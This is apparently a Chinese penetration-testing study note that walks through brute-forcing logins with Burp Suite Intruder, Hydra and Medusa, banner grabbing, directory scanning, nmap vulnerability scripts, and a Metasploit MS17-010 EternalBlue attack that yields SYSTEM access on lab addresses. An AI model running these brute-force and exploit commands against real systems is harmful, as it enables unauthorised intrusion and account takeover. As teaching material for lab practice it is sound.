2019.9.25使用BP和Hydra爆破相关的服务
使用BP和Hydra爆破相关的服务。
Hydra:九头蛇,开源的功能强大的爆破工具,支持的服务有很多,使用hydra爆破c/s架构的服务。使用bp爆破web登录端口。
dvwa:web应用程序漏洞演练平台,开源,集成的常见web漏洞,使用PHP+MYSQL环境的支持。
爆破=爆破工具(bp/hydra)+字典(用户字典/密码字典)
字典:就是一些用户或者口令(弱口令/使用社工软件生成)的集合
bp爆破登录页面(爆破单项密码)
step1:拦截数据包,登录页面的数据需要拦截下来,将拦截到的数据发送到"intruder":点击action,发送到intruder或者ctrl+i;
step2:进入postions模块,先点击clear,去除不需要爆破的项,重新选择要爆破对象的值,点击add,例如:password=§123§,意味着要爆破password,在爆破的过程中使用字典替换123;
step3:进入payloads,在payload options[Simple list]添加密码字典。点击load,找到密码字典位置,加载进来
step4:在options中,可以设置爆破时的一些规则,如:线程,匹配规则,排除规则。
step5:点击start attack。
step6:爆破结束之后,点击length,对结果进行排序,放在前几排的结果可能是正确密码。把账号和密码拿过去测试。
如何快速定位爆破出来的正确结果?
1.需要知道登录成功之后返回来的字符串,如:welcome
2.将字符添加到options中匹配规则中,grep match。
3.在results中,welcome下有选中的是正确结果。
使用bp爆破登录页面(多项)
step1:拦截数据包,登录页面的数据需要拦截下来,将拦截到的数据发送到"intruder":点击action,发送到intruder或者ctrl+i;
step2:进入postions模块,先点击clear,去除不需要爆破的项,重新选择要爆破对象的值,点击add,例如:password=§123§,意味着要爆破password,在爆破的过程中使用字典替换123;同时选择username=§123§。选择攻击模式cluster bomb
step3:在payload set中选1,在payload中选择需要的攻击载荷类型,然后在下方的payload optinos 中加载需要的字典,此处set出选择的1是第一个,2对应第二个选中的。
使用hydra爆破ftp/ssh。
step1:hydra -h 查看帮助信息,爆破单项(爆破密码)
hydra -l admin -P password.txt ftp://192.168.106.1
hydra -l admin -P password.txt 192.168.106.1 ftp
-l 表示知道爆破的账户
-P 后跟密码字典
step2: hydra -L user.txt -P password.txt ssh://192.168.106.128
-L 后跟用户兹迪纳
-P 后跟密码字典
如果爆破的服务修改了端口,使用-e 指定需要的端口。
banner信息收集
banner信息,欢迎语,在banner里中可以得到软件开发商的名字,软件名称,版本,服务类型等信息,通过这些信息可以使用某些工具直接去使用相对应的exp去攻击。
前提条件:需要和目标建立链接,只有建立了链接,才能获取对应的banner信息。
目标服务器上可能对banner信息进行了隐藏或者禁止读取。
搜集方法:
1使用NC(netcat,瑞士军刀)
nc -nv 192.168.111.10 21
-n 表示以数字形式显示ip
-v 表示显示详细信息。
2使用dmitry
dmitry -pb 192.168.106.1
3 nmap -sT -p1-200 --script=banner 192.168.1.1
-sT表示使用基于TCP方式扫描
-p1-200表示扫描端口是1-200
-script 表示使用脚本banner
4 amap -B 192.168.106.1 1-200
-B表示获取banner信息
1-200表示1-200端口
5 借助火狐浏览器中一个插件:wappalyzer,分析目标网站的平台太架构,网站环境
6 使用拦包工具连接响应包,在响应包中可以看到服务器的信息,bp,tamper data,live http heades 等。需要关注响应包中的两个参数,server x-powered-by
美杜莎medusa 开源的,支持的服务有很多种,ftp,ssh,mssql,mysql,snmp等等
kali系统中内置有。
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h 爆破的主机ip
-H ip集合
-u 用户名
-U 用户字典
-p 单个密码
-P 密码字典
-C 组合条目文件username:password
-M 模块
-O 输出list
-e ns e表示制定策略爆破,n表示空密码 s表示密码用户名相同
-n 端口
-t 线程数
-f 找到正确账户密码终止
-r 重试间隔时间
-d 显示所有模块的名称
目录扫描:扫描站点的目录,寻找敏感文件(目录名,探针文件,后台,robots.txt,备份文件,备份文件等)
目录:站点结构,权限控制不严格
探针文件:服务器配置信息,phpinfo.php readme.txt config.txt
后台:管理整个网站的入口,inurl:admin.php
robots.txt:一般存放在站点根目录,如果管理员对于robots.txt文件管理不合理就会造成信息泄露。
备份文件:数据库备份文件,网站备份文件等 .bak .zip www.rar
御剑后台扫描工具:
birbuster:
Nmap最早是linux中扫描和嗅探工具,网络链接扫描工具,主要探测主机存活(是否开机),
开启服务(扫端口),安全性问题(高级用法),系统类型(OS类型)
nmap的安装,配置环境变量。
用法:(命令行模式)
nmap -h
nmap 192.168.121.1 扫描单个ip
状态:
open
closed
filtered 被过滤,探测包被拦截,无法定位端口是否开启
unfiltered 未过滤,探测包没有被拦截,namp无法判断该端口是否开启。
open |filtered 开放或者被过滤的
closed|filtered 关闭或者被过滤的
nmap 192.168.211.0/24 扫描整个网段
nmap 192.168.211.10-200 扫描指定网络
nmap 192.168.211.10,100,200-230 扫描指定网络。
nmap 192.168.122.0/24 192.168.211.0/24 扫描不同网段
nmap -iL filename 扫描目标文件
nmap -iR filename 瞎几把扫模式:nmap -sS -PS80 -iR 0 -p80
nmap 192.168.1.0/24 --exclude 192.168.1.1,255,2-40 排除后面的网址
带有参数的扫描
nmap -sT 192.168.1.1 使用TCP全连接的方式。扫描过程需要三次握手建立连接。建立链接成功则说明端口开放,扫描速度慢。
namp -sS 192.168.1.1 使用SYN的数据包去检测。如果接收到ack,则说明端口开放
namp -sN 192.168.1.1 NULL扫描,发出去的包不设置任何标识位
注意:上述扫描的端口默认都是1-1000;
-p 后跟指定端口 -p20,21,22,80,3306 or -p- == -p1-65535
namp -sV 探测服务版本
nmap 192.168.1.1 >./re.txt
nmap 192.168.1.1 -oX ./re.xml 其中o输出,X是xml格式。
nmap -A 192.168.1.1 获取目标的所有的详细结果。全面扫描
nmap -O 192.168.1.1 探测操作系统类型
--script 使用脚本去探测
nmap --script smb-vuln-ms17-010 192.168.1.1 永恒之蓝
nmap --script smb-check-vulns 192.168.1.1 MS08-067
nmap --script ssl-heartbleed 192.168.1.1 心脏滴血
使用MSF通过MS17-010获取系统权限
step1:开启postgressql数据库 /etc/init.d/postgresql start
step2:是msfconsole 进入msf中
search 17-010搜索cve17-010相关的exp
auxiliary/scanner/smb/smb_ms17_010 扫描漏洞是否存在
exploit/windows/smb/smb_ms17_010_eternalblue用来攻击的exp
step3:探测漏洞是否存在
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.10.10.0/24
exploit
step4:攻击
use exploit/windows/smb/smb_ms17_010_eternalblue
set rhosts 10.10.10.12
exploit
step5: 攻击成功后得到目标主机的system权限。
2019.9.25使用BP和Hydra爆破相关的服务的更多相关文章
- 使用BurpSuite和Hydra爆破相关的服务(9.25 第十一天)
使用BP和Hydra爆破相关的服务 Hydra:九头蛇,开源的功能强大的爆破工具,支持的服务有很多,使用Hydra爆破C/S架构的服务. 使用BurpSuite爆破web服务 DVWA:web应用程序 ...
- 使用BurpSuite、Hydra和medusa爆破相关的服务
一.基本定义 1.爆破=爆破工具(BP/hydra)+字典(用户字典/密码字典). 字典:就是一些用户名或者口令(弱口令/使用社工软件的生成)的集合. 2.BurpSuite 渗透测试神器,使用Jav ...
- [2019.03.25]Linux中的查找
TMUX天下第一 全世界所有用CLI Linux的人都应该用TMUX,我爱它! ======================== 以下是正文 ======================== Linu ...
- Alpha冲刺(2/10)——2019.4.25
所属课程 软件工程1916|W(福州大学) 作业要求 Alpha冲刺(2/10)--2019.4.25 团队名称 待就业六人组 1.团队信息 团队名称:待就业六人组 团队描述:同舟共济扬帆起,乘风破浪 ...
- 爆破root密码hash John the Ripper和hydra爆破ssh密码
官方网站:http://www.openwall.com/john/ 下载:wget http://www.openwall.com/john/j/john-1.8.0.tar.gz 解压:tar - ...
- Beta冲刺(4/7)——2019.5.25
所属课程 软件工程1916|W(福州大学) 作业要求 Beta冲刺(4/7)--2019.5.25 团队名称 待就业六人组 1.团队信息 团队名称:待就业六人组 团队描述:同舟共济扬帆起,乘风破浪万里 ...
- [MP3]MP3固件持续分享(2019.1.25)
转载自我的博客:https://blog.ljyngup.com/archives/179.html/ 所有的固件到我的博客就可以下载哦 最后更新于2019.2.1 前言 这篇文章会持续更新不同型号的 ...
- 初试在线破解工具Hydra爆破3389服务器
hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...
- IntelliJ IDEA 2018.3.3配置 Tomcat 9,控制台出现中文乱码 “淇℃伅”(2019/01/25)
(win10系统) 全新idea配置全新版本Tomcat突遇 “淇℃伅”,网上大部分解决方案均已失效 似乎是idea与Tomcat命令行输出格式不一致所致,千辛万苦在某一小角落发现这个方法,一针见血, ...
随机推荐
- Selenium 2自动化测试实战22(处理HTML5的视频播放)
一.处理HTML5的视频播放 大多数浏览器使用控件(如Flash)来播放视频,但是,不同的浏览器需要使用不同的插件.HTML5定义了一个新的元素<video>,指定了一个标准的方式来嵌入电 ...
- JSP 自定义标签的开发流程
1.编写一个实现Tag接口的标签处理器类 package cn.itcast.web.tag; import java.io.IOException; import javax.servlet.htt ...
- java游戏服务器 建造者模式
这里的具体的建造者ConcreteBuilder可以多个 这里我们以建造汽车为例: 假设汽车需要:方向盘.汽车壳.还有四个轮子 ---------这三样才能跑起来 如果你因为粗心漏了其中的某个建造过 ...
- 使用robotframework做接口测试之一——准备工作
最近发现做接口测试的朋友越来越多了,打算写一个系列的rf+requests做接口测试(主要是Http接口)的文档,可以帮助新入门的同学对接口测试有个大概的了解,同时也是敦促自己做总结的一种手段.希望经 ...
- C和C++的静态函数和静态变量
1.C程序的静态变量和函数 引用自:https://blog.csdn.net/thanklife/article/details/78476737 作者:零点零一 C程序一直由下列部分组成 ...
- Lua for Mac环境搭建
1⃣️在Mac上安装Lua的运行环境再简单不过了,如果你的Mac Terminal上安装了Homebrew的话,只需要键入`brew install lua`即可. longsl-mac:~ long ...
- 3 Java Web 入门 1 Servlet 入门
1 Tomcat 1.1 安装 JDK Oracle 官网 1.2 安装 Tomcat
- 二 MyBatis 从入门到进阶 2 Maven 入门
1 Maven 的使用 1.1 本地仓库与中央仓库 本地仓库:Window \ Preferences \ Maven \ User Settings \ Local Repository 中央仓库: ...
- C学习笔记-指针
指针的概念 指针也是一个变量,指针变量的值是另一个变量的地址 换句话说就是,指针存放的是一个内存地址,该地址指向另一块内存空间 指针变量的定义 指向一个变量的变量 int *p = NULL; p = ...
- jmeter—获取当前时间(年、月、日),往前/往后n天
import java.util.Calendar; Calendar cal = Calendar.getInstance(); int day = cal.get(Calendar.DATE); ...